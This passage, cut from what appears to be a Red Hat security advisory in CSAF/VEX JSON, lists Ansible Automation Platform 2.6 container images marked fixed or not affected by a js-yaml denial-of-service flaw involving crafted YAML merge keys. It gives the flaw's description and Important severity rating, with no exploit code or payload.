"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2498122"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in js-yaml, a JavaScript YAML parser and dumper. A remote attacker could exploit this vulnerability by providing a specially crafted YAML document containing a chain of mappings with merge keys. This could cause the parser to consume excessive CPU resources, leading to a Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "js-yaml: js-yaml: Denial of Service via crafted YAML documents",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated as Important. Red Hat products utilizing `js-yaml` to process untrusted YAML input are susceptible to a denial of service, as a remote attacker can provide a crafted document that consumes excessive CPU resources. This is considered Important due to the potential for service disruption without requiring authentication or complex attack vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
